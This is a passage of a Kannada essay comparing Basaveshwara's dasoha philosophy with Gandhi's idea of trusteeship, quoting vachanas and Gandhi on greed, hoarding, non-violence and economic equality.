“ದೇವರು ಎಂದಿಗೂ ನಾಳೆಗಳಿಗೆಂದು ಶೇಖರಿಸಿಡುವುದಿಲ್ಲ. ಆ ಕ್ಷಣಕ್ಕೆಷ್ಟು ಬೇಕು ಅಷ್ಟನ್ನು ಮೀರಿ ಎಂದೂ ಅವನು ಸೃಷ್ಟಿ ಮಾಡುವುದಿಲ್ಲ.  ಆದ್ದರಿಂದ ಅವನ ಈ ನಿಯಮದ ಮೇಲೆ ಅಚಲ ನಂಬಿಕೆಯಿಟ್ಟಲ್ಲಿ ದಿನವೂ ಜೀವನೋಪಾಯ ಸಮಸ್ತ ಜೀವರಾಶಿಗೂ ಲಭಿಸುತ್ತದೆ. ಆದರೆ ಈ ತತ್ವವನ್ನು ಗಾಳಿಗೆ ತೂರಿದ್ದೇವೆ. ಆದ್ದರಿಂದಲೇ ಅಸಮಾನತೆ” – ಗಾಂಧೀಜಿಯ ಈ ಮಾತು ನಿಸರ್ಗದ ಸಹಜತೆಯೊಂದಿಗೆ ಬಾಳಬೇಕಾದ ಅನಿವಾರ್ಯತೆಯನ್ನು ತಿಳಿಸುತ್ತದೆ. “ಸಣ್ಣ ಹಾಗೂ ದೊಡ್ಡ ಪ್ರಾಣಿಗಳಿಗೆ ತಕ್ಕಂತೆ ದೇವರು ಹೇಗೆ ಆಹಾರ ದಯಪಾಲಿಸುತ್ತಾನೋ ಹಾಗೇ ಮನುಷ್ಯನಿಗೂ ನೀಡುತ್ತಾನೆ. ಮಾನವ ಮಾತ್ರ ದುರಾಸೆ, ಅಂತಸ್ತಿಗೆ ಜೋತುಬಿದ್ದು ಶೇಖರಣೆಗೆ ತೊಡಗುತ್ತಾನೆ. ಮನುಷ್ಯನ ಅತಿಯಾಸೆಯಿಂದ ಸಮಾಜದ ಸಮತೋಲನ ಹಾಳಾಗಿದೆ” ಎನ್ನುತ್ತಾರೆ.

ಬಸವೇಶ್ವರರ ಭಕ್ತಿ ಪಥದಲ್ಲಿ ಸಮಾಜವೇ ದೇವರು. ಸಮಾಜದ ಆಸ್ತಿ ಸಮಾಜಕ್ಕೇ ವಿನಿಯೋಗವಾಗಬೇಕು. “ಸಮಾಜದಿಂದ ಪಡೆದೆ (ಸಂಪಾದಿಸಿದೆ). ಅವಶ್ಯಕತೆಗಿಂತ ಹೆಚ್ಚಾದುದನ್ನು ಮತ್ತೆ ತಿರುಗಿ ಸಮಾಜಕ್ಕೆ ಸಮರ್ಪಿಸಿದೆ” ಎನ್ನುವ ದಾಸೋಹ ಭಾವ ಶರಣನದು:

ನಾನು ಆರಂಬವ ಮಾಡುವೆನಯ್ಯಾ, ಗುರುಪೂಜೆಗೆಂದು:
ನಾನು ಬೆವಹಾರವ ಮಾಡುವೆನಯ್ಯಾ, ಲಿಂಗಾರ್ಚನೆಗೆಂದು:
ನಾನು ಪರಸೇವೆಯ ಮಾಡುವೆನಯ್ಯಾ, ಜಂಗಮದಾಸೋಹಕ್ಕೆಂದು:
… … … ನೀ ಕೊಟ್ಟ ದ್ರವ್ಯವ ನಿಮಗಲ್ಲದೆ ಮತ್ತೊಂದಕ್ಕೆ ಮಾಡೆನು…
ನಿಮ ಸೊಮ್ಮ ನಿಮಗೆ ಸಲಿಸುವೆನು, ನಿಮ್ಮಾಣೆ…

ಏನೇ ಕ್ರಿಯೆ ಮಾಡಿದರೂ ಅದು ದೇವರಿಗೆ ಸಲ್ಲಬೇಕು ಎನ್ನುವ ಬಸವೇಶ್ವರರಿಗೆ ಗುರು-ಲಿಂಗ-ಜಂಗಮ ಬೇರೆ ಬೇರೆಯಲ್ಲ. ಅವು ಕೇವಲ ಒಣ ಧಾರ್ಮಿಕ ತತ್ವಗಳಲ್ಲ. “ಉಪದೇಶ ಕೊಟ್ಟು ಗುರುವಾದ, ಕರಸ್ಥಲಕ್ಕೆ ಬಂದು ಲಿಂಗವಾದ, ಹಸರವಾದ ಪ್ರಪಂಚವನಳಿದು ದಾಸೋಹವ ಮಾಡಿಸಿಕೊಂಡು ಜಂಗಮವಾದ, ಇಂತೀ ಗುರುಲಿಂಗ ಜಂಗಮ ಒಂದೆಯಲ್ಲದೆ ಭಿನ್ನವಿಲ್ಲ” ಅವರಿಗೆ ಗಳಿಕೆ ಎಲ್ಲವೂ ಸಮಾಜಕ್ಕೆ, ಹೀಗಿರುವಾಗ ತನಗಿಷ್ಟು ಎಂದು ಇಟ್ಟುಕೊಳ್ಳುವುದು ಎಲ್ಲಿಂದ ಬಂತು?

ಕಾಯಕವೇ ಕೈಲಾಸ ತತ್ವ ಸಾರಿದ ಬಸವಣ್ಣನವರು ದುಡಿಮೆಗೆ ಎಷ್ಟೋ ದಾಸೋಹಕ್ಕೂ ಅಷ್ಟೇ ಪ್ರಾಮುಖ್ಯತೆಯನ್ನು ಕೊಡುತ್ತಾರೆ.
ಅಯ್ಯಾ ನಿಮ್ಮ ಶರಣರ ದಾಸೋಹಕ್ಕೆ
ಎನ್ನ ತನುಮನಧನವಲಸದಂತೆ ಮಾಡಯ್ಯಾ
ತನು ದಾಸೋಹಕ್ಕೆ ಉಬ್ಬುವಂತೆ ಮಾಡು,
ಮನ ದಾಸೋಹಕ್ಕೆ ಲೀಯಹವಂತೆ ಮಾಡು,
ಧನ ದಾಸೋಹಕ್ಕೆ ಸವೆದು, ನಿಮ್ಮ ಶರಣರ ಪ್ರಸಾದದಲ್ಲಿ
ನಿರಂತರ ಆಡಿ, ಹಾಡಿ, ನೋಡಿ, ಕೂಡಿ, ಭಾವಿಸಿ ಸುಖಿಸಿ:
ಪರಿಣಾಮಿಸುವಂತೆ ಮಾಡು……

ಇಲ್ಲಿ ವ್ಯಕ್ತಿಯ ತನುಮನ ಧನದ ಒಟ್ಟು ಮೊತ್ತವಾದ ಸ್ವಯಂ ಪ್ರಜ್ಞೆಯು ಸಮಾಜದ ಸಮ್ಯಕ್ ಸ್ಥಿತಿಯ ಸಮತೋಲನಕ್ಕೆ ನಿರಂತರ ದುಡಿಯುವುದನ್ನು ಕಾಣಬಹುದು. ಧಾರ್ಮಿಕ ಚೌಕಟ್ಟಿನಲ್ಲಿ ಹರಳುಗೊಂಡ ಸಾಮಾಜಿಕ ಜವಾಬ್ದಾರಿ ಇಲ್ಲಿ ನೆಲೆ ನಿಂತಿದೆ.

ಬಸವೇಶ್ವರರು ಲಿಂಗ-ಜಂಗಮವನ್ನು ಸಂಬಂಧಿಸಿದ ಪರಿಯೇ ಮಾನವತಾವಾದದ ಪರಾಕಾಷ್ಟತೆ ಎನ್ನಬಹುದು. “ಕನ್ನಡಿಯ ನೋಡುವ ಅಣ್ಣಗಳಿರಾ, ಜಂಗಮವ ನೋಡಿರೆ” ಎನ್ನುವ ಮಾತು ಇದನ್ನೇ ಸಮರ್ಥಿಸುತ್ತದೆ. “ಜಂಗಮವಿಲ್ಲದೆ ಲಿಂಗಾರ್ಚನೆ ಮಾಡಬಹುದೆ?” ಎಂದು ಅವರು ಪ್ರಶ್ನಿಸುತ್ತಾರೆ. ಜನಕಲ್ಯಾಣ ಬಯಸದೆ, ಲಿಂಗಾರ್ಚನೆ ಮಾಡಿ ಪ್ರಯೋಜನವೇನು? ಈ ಮನೋಭಾವದ ಮೇಲೆ ಅವರ ತತ್ವ ರೂಪಿತವಾಗಿರುವುದರಿಂದಲೇ ಜನಪ್ರಜ್ಞೆ, ರಾಷ್ಟ್ರಪ್ರಜ್ಞೆಯನ್ನು ಮೂಲಭೂತವಾಗಿ ಬೆಳೆಸುವುದರಲ್ಲೇ ದಾಸೋಹ ತತ್ವವು ಪರಿಪೂರ್ಣತೆಯನ್ನು ಪಡೆಯುತ್ತದೆ.

ಇದೇ ದಿಶೆಯಲ್ಲಿ ಮುಂದುವರೆಯುವ ಗಾಂಧೀಜಿ, ಧರ್ಮದರ್ಶಿತ್ವಕ್ಕೆ ಸಮಾಜದಲ್ಲಿ ನ್ಯಾಯ ಸಮ್ಮತಿಯಿದೆಯೇ ಎನ್ನುವ ಪ್ರಶ್ನೆಗೆ ಹೀಗೆ ಉತ್ತರಿಸುತ್ತಾರೆ: “ಸೃಷ್ಟಿಕರ್ತ ಭಗವಂತನಿಗೆ ಸಂಪತ್ತನ್ನು ಶೇಖರಿಸುವ ಅಗತ್ಯವಿರಲಿಲ್ಲ. ದಿನದವಶ್ಯಕತೆಗೆ ತಕ್ಕಂತೆ ಆತ ಎಲ್ಲವನ್ನೂ ಸೃಷ್ಟಿಸಿದ.  ಆದ್ದರಿಂದ ಜನರೂ ಸಂಪತ್ತನ್ನು ದಿನದವಶ್ಯಕತೆಗೆ ತಕ್ಕಂತೆ ಬಳಸಬೇಕು. ಈ ತತ್ವವನ್ನು ಪ್ರತಿಯೊಬ್ಬರೂ ಅಳವಡಿಸಿಕೊಂಡಿದ್ದೇ ಆದಲ್ಲಿ ಧರ್ಮದರ್ಶಿತ್ವ ನ್ಯಾಯಸಮ್ಮತವಾದಂತೆ. ಇದರಿಂದ ಸಮಾಜದಲ್ಲಿ ಶೋಷಣೆ ಇರದು. ಧರ್ಮದರ್ಶಿತ್ವವನ್ನು ಜಗತ್ತಿಗೆ ಭಾರತದ ಕಾಣಿಕೆಯಾಗಿ ಕೊಡಬಹುದು” ಎಂಬುದು ಗಾಂಧೀಜಿಯ ನಂಬಿಕೆಯಾಗಿತ್ತು. ಶ್ರೀಮಂತರಿಗೆ ಗಾಂಧೀಜಿಯ ಕಿವಿಮಾತು ಹೀಗಿದೆ: “ಈಗಿನ ಶ್ರೀಮಂತರು ವರ್ಗಗಳ ನಡುವೆ ನಡೆಯುತ್ತಿರುವ ಸಂಘರ್ಷಣೆಯನ್ನು ಎದುರಿಸಬೇಕು. ಇಲ್ಲವೇ ತಮ್ಮ ಹೆಚ್ಚಿನ ಆಸ್ತಿಗೆ ಧರ್ಮದರ್ಶಿಗಳಾಗಬೇಕು.” ಹೀಗೆ ಉದಾತ್ತ ನೆಲೆಯಲ್ಲಿ ಧರ್ಮದರ್ಶಿಗಳಾದವರ ಮಕ್ಕಳು ಇದೇ ಸದ್ಭಾವನೆಯನ್ನು ಮುಂದುವರೆಸಿಕೊಂಡು ಹೋಗುವ ಅರ್ಹತೆ ತೋರಿಸಿದಲ್ಲಿ ಮಾತ್ರ ಅವರೂ ಧರ್ಮದರ್ಶಿಯಾಗಬಹುದೆಂದು ಸ್ಪಷ್ಟಪಡಿಸುತ್ತಾರೆ. ಅಂದರೆ ಇದು ವ್ಯಕ್ತಿಯೊಬ್ಬನ ಮೇಲೆ ಹೇರಲ್ಪಡುವ ವಿಚಾರವಲ್ಲ. ಬದಲಿಗೆ ಆತ ಸ್ವಯಂ ಮುಂದೆ ಬಂದು ಇಂತಹ ಹೊಣೆ ಹೊರಬೇಕೆಂಬುದು ಗಾಂಧೀಜಿಯ ಅಪೇಕ್ಷೆಯಾಗಿತ್ತು.

ಆರ್ಥಿಕ ಸಮತೆ:

ಕೆಲವರಲ್ಲಿ ತಿಂದು ತೇಗಿ ಬಿಸಾಡುವಷ್ಟು ದಾಷ್ಟ್ಯತನವಿದ್ದರೆ ಹಲವರಿಗೆ ದಿನಕ್ಕೆ ಒಂದು ಹೊತ್ತೂ ಊಟವಿಲ್ಲ.  ಶ್ರೀಮಂತರಾಗಬೇಕೆಂಬ ದುರಾಸೆಯೇ ಇಂತಹ ಅಸಮಾನತೆಗೆ ಕಾರಣವೆಂಬುದನ್ನು ಬಸವಣ್ಣನವರು ಹಾಗೂ ಗಾಂಧೀಜಿ ಅರಿತಿದ್ದರು.  20ನೇ ಶತಮಾನದಂತಹ ಆಧುನಿಕ ಸಮಾಜದಲ್ಲಿರುವ ಅಸಮಾನತೆ ಹೋಗಲಾಡಿಸಬೇಕೆಂದರೆ ಬಂಡವಾಳ- ದುಡಿಮೆಯ ನಡುವೆ ನಿರಂತರ ನಡೆಯುತ್ತಿರುವ ಹೋರಾಟವನ್ನು ಕೊನೆಗಾಣಿಸಲೇ ಬೇಕು ಎನ್ನುವುದು ಅವರ ಅಭಿಮತ. ಉಳ್ಳವರು – ಇಲ್ಲದವರು ಸಮಾಜದಲ್ಲಿ ಸಮಪಾತಳಿಗೆ ಬಂದಾಗಲೇ ಇದು ಸಾಧ್ಯ. ಇಲ್ಲದಿದ್ದಲ್ಲಿ ರಕ್ತಕ್ರಾಂತಿ ನಡೆಯುವಲ್ಲಿ ಅನುಮಾನವಿಲ್ಲ. ಹೀಗಾಗಿ ಹೆಚ್ಚುತ್ತಿರುವ ಆರ್ಥಿಕ ಅಸಮಾನತೆಯನ್ನು ಮೊದಲು ತಡೆಯಬೇಕು. ಈ ಕಾರ್ಯವನ್ನು ಹಿಂಸಾಮಾರ್ಗದಲ್ಲಿ ಜಾರಿಗೆ ತಂದರೆ ಸಮಾಜದ ಶಾಂತಿ ಕದಡುತ್ತದೆ. ಆದ್ದರಿಂದ ಅಹಿಂಸಾ ಮಾರ್ಗವನ್ನೇ ಹಿಡಿಯಬೇಕು. ಇದಕ್ಕೆ ಮನಸ್ಸುಗಳು ಸಜ್ಜುಗೊಳ್ಳಬೇಕು ಎಂಬುದು ಗಾಂಧೀಜಿಯ ಅಭಿಮತ. “ಅಹಿಂಸೆಯ ಮೂಲಕ ನನ್ನ ಚಿಂತನೆಯನ್ನು ಒಪ್ಪುವಂತೆ ಜನರನ್ನು ಪರಿವರ್ತನೆ ಮಾಡುತ್ತೇನೆ. ಅದರ ಮೂಲಕ ಆರ್ಥಿಕ ಸಮತೆ ತರುತ್ತೇನೆ” ಎಂದು ಹೇಳುತ್ತಿದ್ದರು. ಹಾಗೆಂದು ಎಲ್ಲರೂ ಪರಿವರ್ತನೆಯಾಗುವವರೆಗೂ ಕಾಯುತ್ತಾ ಕುಳಿತಿರುವುದು ಪ್ರೌಢ ಹೆಜ್ಜೆಯಾಗಲಾರದು. ಈ ಕಾರ್ಯ ಪ್ರಾರಂಭವಾಗಬೇಕು, ನಂತರ ಜನರ ಮನಸ್ಸನ್ನು ಪರಿವರ್ತನೆ ಮಾಡುತ್ತಾ ಈ ಆಂದೋಲನಕ್ಕೆ ಜೀವಂತಿಕೆ ತುಂಬಬಹುದೆಂದು ನಂಬಿದ್ದರು. “ಇಡೀ ಸಮಾಜ ಬದಲಾಗುವವರೆಗೆ ಕಾಯುವುದಿಲ್ಲ. ನಾನೇ 50 ಕಾರುಗಳ ಮಾಲೀಕನಾಗಿದ್ದುಕೊಂಡು ಜನರನ್ನು ಪರಿವರ್ತನೆ ಮಾಡಲಾರೆ. ಆದ್ದರಿಂದ ಬಡವರಲ್ಲಿ ಬಡವನಾಗುತ್ತೇನೆ. ಹೇಳಬೇಕೆಂದರೆ ಕಳೆದ 50 ವರ್ಷಗಳಿಂದ ನಾನಿದನ್ನೇ ಮಾಡುತ್ತಿದ್ದೇನೆ” ಎಂದು ಹೇಳಿದರು.

ನಿಮಗೆಷ್ಟು ಬೇಕೋ ಅಷ್ಟು ದುಡಿದು ಸುಮ್ಮನಿದ್ದು ಬಿಡಿ ಎಂದು ಬಸವೇಶ್ವರರು ಹೇಳಲಿಲ್ಲ. ಸಾಮರ್ಥ್ಯವಿದ್ದಷ್ಟು ದುಡಿಯಬೇಕು.  ಹೆಚ್ಚಳ ಸಂಪಾದನೆಯನ್ನು ಸಮಾಜಕ್ಕೆ ವಿನಿಯೋಗಿಸಬೇಕು ಎಂಬುದೇ ಅವರ ನಿಲುವು. ಆದ್ದರಿಂದಲೇ ಅವರ ಕಾಲದಲ್ಲಿ ಸಮಾಜದ ಆರ್ಥಿಕ ಸ್ಥಿತಿ ಸುಧಾರಣೆಯಾಗಲು ಸಾಧ್ಯವಾಯಿತು. ನೈಸರ್ಗಿಕ ಸಂಪನ್ಮೂಲ ಹಾಗೂ ಅವಕಾಶಗಳು ಸಮವಾಗಿ ಎಲ್ಲಾ ಪ್ರಾಂತ್ಯಗಳಿಗೂ, ವ್ಯಕ್ತಿಗಳಿಗೂ ನಮ್ಮ ರಾಷ್ಟ್ರದಲ್ಲಿ ಸಿಗದೇ ಇರುವುದರಿಂದ ಬಸವೇಶ್ವರರ ಈ ನಿಲುವು ಇಂದು ಇನ್ನೂ ಹೆಚ್ಚು ಅವಶ್ಯವಾಗಿದೆ.

ಇದೇ ನಿಟ್ಟಿನಲ್ಲಿ ತಮ್ಮ ವಿಚಾರಲಹರಿಯನ್ನು ಹರಿಬಿಡುವ ಗಾಂಧೀಜಿ ಆರ್ಥಿಕ ಸಮಾನತೆಯನ್ನು ವಿಶಿಷ್ಟ ರೀತಿಯಲ್ಲಿ ವ್ಯಾಖ್ಯಾನಿಸುತ್ತಾರೆ.  “ಎಲ್ಲರೂ ಸಮನಾಗಿ ಹಣ ಹೊಂದುವುದು ಆರ್ಥಿಕ ಸಮತೆಯಲ್ಲ. ಪ್ರತಿಯೊಬ್ಬರೂ ಅಗತ್ಯಕ್ಕೆಷ್ಟು ಬೇಕೋ ಅಷ್ಟು ಹೊಂದಿರುವುದು ಎಂದಿದರರ್ಥ. ಉದಾಹರಣೆಗೆ ಇರುವೆಗೆ ಎಷ್ಟು ಆಹಾರ ಬೇಕೋ ಅದರ ಸಾವಿರ ಸಾವಿರ ಪಾಲು ಆನೆಗೆ ಬೇಕು. ಇದು ಅಸಮಾನತೆಯಲ್ಲ. ಒಬ್ಬ ವ್ಯಕ್ತಿ ಅವನ ಹೆಂಡತಿ- ಮಕ್ಕಳಿಗೆ ಎಷ್ಟು ಬೇಕೋ ಅಷ್ಟನ್ನು ತನಗೊಬ್ಬನಿಗೇ ಬಯಸಿದರೆ ಅದು ಅಸಮಾನತೆ.” ಪ್ರತಿಯೊಬ್ಬನೂ ದಿನದವಶ್ಯಕತೆ ಮೀರಿ ಬಳಸಬಾರದು. ಎಷ್ಟಾದರೂ ಸಂಪಾದಿಸಬಹುದು. ಆದರೆ, ಅವೆಲ್ಲಕ್ಕೂ ಆತ ಒಡೆಯನಾಗಲಾರ.

ಇದನ್ನೇ ಬಸವೇಶ್ವರರು “ಧನವನಿರಿಸದಿರಾ, ಇರಿಸಿದರೆ ಭವ ಬಪ್ಪುದು ತಪ್ಪದು” ಎಂದು ಎಚ್ಚರಿಸುತ್ತಾರೆ. ಹೊಟ್ಟೆಬಾಕತನ ಸಲ್ಲದು, ದುರಾಸೆಯ ದುರ್ಮಾರ್ಗ ಯಾರಿಗೂ ಒಳಿತಾಗದು. ಮನುಷ್ಯನ ದುರಾಸೆಗೆ ಕಾರಣವಾಗುವ ಭಾವನೆಗಳ ಮೂಲವನ್ನೇ ತಮ್ಮ ಚಿಕಿತ್ಸೆಗೆ ಗುರಿಪಡಿಸುತ್ತಾರೆ. ಕೂಡಿಟ್ಟ ಹಣ ಮತ್ತು ಕಪ್ಪು ಹಣ ರಾಷ್ಟ್ರಕ್ಕೆ ಹಾನಿ. ಈ ಸೂಕ್ಷ್ಮತೆ ಅರಿತ ಬಸವೇಶ್ವರರು ಆರ್ಥಿಕ ಸಮತೆಯ ಸಾಧನೆಯ ಹಿಂದೆ ಸನ್ನದ್ಧವಾಗಬೇಕಾದ ಮನಸ್ಸುಗಳಿಗೆ ಮನೋವೈಜ್ಞಾನಿಕ ಮಾರ್ಗ ತೋರಿಸುತ್ತಾರೆ:
ಆಯುಷ್ಯವುಂಟು ಪ್ರಳಯವಿಲ್ಲೆಂದು ಅರ್ಥವ ಮಡುಗುವಿರಿ,
ಆಯುಷ್ಯತೀರಿ ಪ್ರಳಯ ಬಂದಡೆ ಆ ಅರ್ಥವನುಂಬುವರಿಲ್ಲ,
ನೆಲನನಗೆದು ಮಡುಗಿದಿರಾ, ನೆಲನುಂಗಿದಡುಗುಳೂದೆ?…

ಹೂಳಿಟ್ಟ ಹಣದಿಂದ ಯಾರಿಗೂ ಪ್ರಯೋಜನವಿಲ್ಲ. ಅದರಿಂದ ರಾಷ್ಟ್ರದ ಆರ್ಥಿಕ ಮುಗ್ಗಟ್ಟು ಹೆಚ್ಚುತ್ತದೆ. ಇದೇ ಇಂದು ನಮ್ಮನ್ನು ಭೂತಾಕಾರವಾಗಿ ಕಾಡುತ್ತಿರುವ ಕಪ್ಪು ಹಣದ ಸವiಸ್ಯೆ.  ಈ ವಚನ ನೇರವಾಗಿ ಸಮಸ್ಯೆಯ ಮೂಲವನ್ನೇ ಹಿಡಿದಿದೆ. ಮನಸ್ಸು ಎಲ್ಲಾ ಕ್ರಿಯೆಗಳಿಗೂ ಮೂಲ. ಆದ್ದರಿಂದ ಏನಾದರೂ ಬದಲಾವಣೆಯಾಗಬೇಕೆಂದರೆ ಮೊದಲು ಮನಸ್ಸಿನಲ್ಲಾಗಬೇಕು. ಮನಸ್ಸು ಸಿದ್ಧವಾದಲ್ಲಿ ಪ್ರಗತಿ ಕಾಣಿಸಿಕೊಂಡಿತೆಂದೇ ಅರ್ಥ.

ಗಾಂಧೀಜಿಯು ಆಧುನಿಕ ಸಮಾಜದ ವೈರುಧ್ಯಗಳನ್ನು ಗಮನಿಸಿದ್ದರು. ಆರ್ಥಿಕ ವ್ಯವಸ್ಥೆಯ ಸಂಕೀರ್ಣತೆಯನ್ನೂ ಅರ್ಥೈಸಿಕೊಂಡಿದ್ದರು:  “ಹಿಂಸೆಯ ಮಾರ್ಗ ಹಿಡಿದು ನಾವು ಶ್ರೀಮಂತರ ಮೇಲೆ ಹರಿಹಾಯ್ದರೆ ನಷ್ಟವೇ ಹೊರತು ಪ್ರಯೋಜನವಿಲ್ಲ. ಇದರಿಂದ ಹೆಚ್ಚು ಸಂಪಾದನೆ ಮಾಡುವ ವ್ಯಕ್ತಿಯನ್ನು ಸಮಾಜ ಕಳೆದುಕೊಂಡಂತಾಗುತ್ತದೆ.” ಮನಪರಿವರ್ತನೆಯಾಗಿ ಅವರೇ ತಮ್ಮ ಹೇರಳ ಆಸ್ತಿಗೆ ಧರ್ಮದರ್ಶಿಗಳಾದರೆ ಸಮಾಜಕ್ಕೆ ಆಗುವ ಲಾಭ ಅಷ್ಟಿಷ್ಟಲ್ಲ. ಇದರಿಂದ ಸಮಾನತೆಯನ್ನು ಸುಲಭವಾಗಿ ಸಾಧಿಸಬಹುದು. ಬಡ್ಡಿಗೆ ಹಣಕೊಟ್ಟು ರೈತರ ಸುಲಿಗೆ ಮಾಡುತ್ತಿದ್ದ ಜಮೀನ್ದಾರರ ವಿರುದ್ಧ ನಡೆದ ಎಷ್ಟೋ ಹಿಂಸಾತ್ಮಕ ಚಳವಳಿಗಳು ಫಲ ನೀಡಲಿಲ್ಲ ಎಂಬುದನ್ನು ಈ ಸಂದರ್ಭದಲ್ಲಿ ನೆನಪಿಸಿಕೊಳ್ಳಬಹುದು. ಆದ್ದರಿಂದಲೇ ಸ್ವಾತಂತ್ರ್ಯ ಸಂಗ್ರಾಮದಲ್ಲಿ ಜಮೀನ್ದಾರರ ದಬ್ಬಾಳಿಕೆಯನ್ನು ಕಂಡಿದ್ದರೂ ಗಾಂಧೀಜಿ ದುಡುಕಲಿಲ್ಲ. ಅಹಿಂಸಾ ಮಾರ್ಗದಿಂದಲೇ ಅವರ ಪರಿವರ್ತನೆಗೆ ಮುಂದಾದರು.

ಬಡ್ಡಿಗೆ ಹಣ ಕೊಟ್ಟು ಇತರರನ್ನು ಸುಲಿಗೆ ಮಾಡಿ ಶ್ರೀಮಂತರಾಗುವವರನ್ನು ಹಾಗೂ ಇದರಿಂದಾಗುವ ಅನ್ಯಾಯವನ್ನು ನೋಡಿ ಬಸವೇಶ್ವರರು ಹೇಳುತ್ತಾರೆ:
ಹಡೆದೊಡವೆ ವಸ್ತುವನು ಮೃಡಭಕ್ತರಿಗಲ್ಲದೆ:
ಕಡ ಬಡ್ಡಿಯ ಕೊಡಲಾಗದು,
ಬಂದಡೊಂದು ಲೇಸು, ಬಾರದಿದ್ದೆರಡು ಲೇಸು-

ಇದು ಬಸವೇಶ್ವರರ ಭಕ್ತಿಪಥದ ವೈಶಿಷ್ಟ್ಯ, ಗಾಂಧೀಜಿಯ ಧೋರಣೆಯೂ ಇದೇ ಆಗಿತ್ತು. ಹಿಂಸಾ ಮಾರ್ಗವನ್ನು ತಳ್ಳಿಹಾಕುವ ಅವರು ಆರ್ಥಿಕ ಸಮತೆಯ ಕಾರ್ಯವೂ ಅಹಿಂಸಾ ಮಾರ್ಗದಲ್ಲಿ ನಡೆಯಬೇಕೆನ್ನುತ್ತಾರೆ. ಬೆವರು ಸುರಿಸದೆ ಉಣಲಾಗದು. ಮಕ್ಕಳಿರುವರೆಂದು ಅವರ ಭವಿಷ್ಯಕ್ಕಾಗಿ ಅಗತ್ಯಕ್ಕಿಂತ ಶೇಖರಿಸಲಾಗದು. ಇಂದಿನ ದಿನಗಳಲ್ಲಿ ದುಡಿಯಲು ಅವಕಾಶ ಸಿಕ್ಕರೆ ಸಾಕು ಹಣ ಸಂಪಾದಿಸಿ ಆಸ್ತಿಯನ್ನು ಗುಡ್ಡೆ ಹಾಕಲು ಮುಂದಾಗುತ್ತಾರೆ. ಅಂತಹುದರಲ್ಲಿ ಅಧಿಕಾರದಲ್ಲಿದ್ದರೆ ಕೇಳಬೇಕೇ? ಇಡೀ ಸಮಾಜಕ್ಕೆ ಜವಾಬುದಾರ (ಂಛಿಛಿouಟಿಣಚಿbಟe) ನಾಗುವ ಬದಲು ಮನುಷ್ಯ ದುರಾಸೆಗೆ ಬೀಳುತ್ತಾನೆ. ಅಧಿಕಾರ ಆತನ ಕೈಯಲ್ಲಿ ದುರುಪಯೋಗವಾಗುತ್ತದೆ. ಅದಕ್ಕೇ ಬಸವೇಶ್ವರರು, “ಕೈಕೂಲಿಯನ್ನಾದರೂ ಮಾಡಿ ಮೌಲ್ಯ ಉಳಿಸಿಕೊಳ್ಳುವೆ. ನನಗೆ ನನ್ನ ಸಂಸಾರಕ್ಕೆ, ಇಂದಿಂಗೆ ನಾಳಿಂಗೆ ಯೋಚಿಸಲಾರೆ” ಎಂದು ಘೋಷಿಸುತ್ತಾರೆ. ಗಾಂಧೀಜಿಯ ನಿಲುವೂ ಇದಕ್ಕಿಂತ ಭಿನ್ನವಾಗಿರಲಿಲ್ಲ. ವ್ಯಕ್ತಿಯು ತನ್ನ ಬೇಕು ಬೇಡಗಳ ಮೇಲೆ ಹತೋಟಿ ಸಾಧಿಸಿದಾಗ ಮಾತ್ರ ಸಮಾನತೆಯ ಕನಸು ನನಸಾಗುತ್ತದೆ ಎಂದು ತಮ್ಮ ಬದುಕಿನ ಪ್ರತಿ ಹೆಜ್ಜೆಯ ಮೂಲಕ ತೋರಿಸಿಕೊಡುತ್ತಾರೆ.

ಹೀಗೆ ಬಸವೇಶ್ವರರ ದಾಸೋಹ ತತ್ವ- ಗಾಂಧೀಜಿಯ ಧರ್ಮದರ್ಶಿತ್ವ ಮಾನವ ಕಲ್ಯಾಣದ ಗುರಿಯತ್ತ ಸಾಗುವ ತತ್ವಗಳಾಗಿವೆ.  ಇವರೀರ್ವರ ನಡುವೆ ಸುಮಾರು ಎಂಟು ಶತಮಾನಗಳ ಅಂತರವಿದ್ದರೂ ಅವರ ಆಶಯ ಒಂದೇ ತೆರನಾಗಿದ್ದವು. “ಯಾವ ಕ್ಷಣದಿಂದ ಮನುಷ್ಯ ನಾನೊಬ್ಬ ಸಮಾಜ ಸೇವಕ, ನನ್ನೆಲ್ಲ ಗಳಿಕೆ- ವೆಚ್ಚಗಳು ಅದರ ಸಲುವಾಗಿ ಎಂದು ನಂಬುತ್ತಾನೋ ಅಂದಿಗೆ ಅವನಲ್ಲಿ ಶುದ್ಧತೆ ನೆಲೆಯೂರುತ್ತದೆ. ಸಮಾಜ ಕಲ್ಯಾಣವಾಗುತ್ತದೆ” ಎಂದ ಗಾಂಧೀಜಿಯ ನಿಲುವಿನಲ್ಲಿ, “ಲಿಂಗವ ಪೂಜಿಸಿ ಜಂಗಮವನುದಾಸೀನವ ಮಾಡಿದಡೆ ಬೆಂದೆನಯ್ಯಾ ನಾನು” ಎನ್ನುವ ಬಸವೇಶ್ವರರ ಭಕ್ತಿ ಪಥದಲ್ಲಿ ಮನುಕುಲೋದ್ಧಾರದ ಕಾಳಜಿಯಿದೆ.

ಈ ಮಹೋನ್ನತ ತತ್ವಗಳು ಮಾನವ ಸಂಕುಲ ಯಾವ ಯುಗಕ್ಕೆ ಕಾಲಿಟ್ಟರೂ ಅದರ ಉನ್ನತಿಗೆ ದುಡಿಯುತ್ತವೆ. ಮಾನವ ಹೊಸ ಹೊಸ ಆವಿಷ್ಕಾರಗಳೊಡನೆ ಮುನ್ನಡೆಯುತ್ತಿದ್ದರೂ ಹೆಚ್ಚು ಸ್ವಾರ್ಥಿಯಾಗುತ್ತಿದ್ದಾನೆಂಬುದು ದುಃಖದ ಸಂಗತಿ.  ಇಂದು- ನಾಳಿನ ಲೆಕ್ಕಾಚಾರಕ್ಕೆ ಜೋತುಬಿದ್ದು ಗಳಿಕೆಯ ನಾಗಾಲೋಟದಲ್ಲಿ ಸಾಮಾಜಿಕ ಜವಾಬ್ದಾರಿಯನ್ನು ನಾವು ಎಂದೋ ಗಾಳಿಗೆ ತೂರಿ ಬಿಟ್ಟಿದ್ದೇವೆ. ಆದ್ದರಿಂದಲೇ ಈ ತತ್ವಗಳು ನಮಗೀಗ ಗಗನ ಕುಸುಮಗಳೆಂಬಂತೆ ಗೋಚರಿಸುತ್ತವೆ. ಈ ಹುಚ್ಚು ಓಟ ನಿಲ್ಲಿಸಿ ಕಳೆದುಕೊಳ್ಳುತ್ತಿರುವ ಮಾನವತೆಯನ್ನು- ಅದರ ಜವಾಬ್ದಾರಿಯನ್ನು ಅರಿತು ವ್ಯವಧಾನದಿಂದ ಯೋಚಿಸಿದಾಗ ಈ ತತ್ವಗಳ ಅನಿವಾರ್ಯತೆ 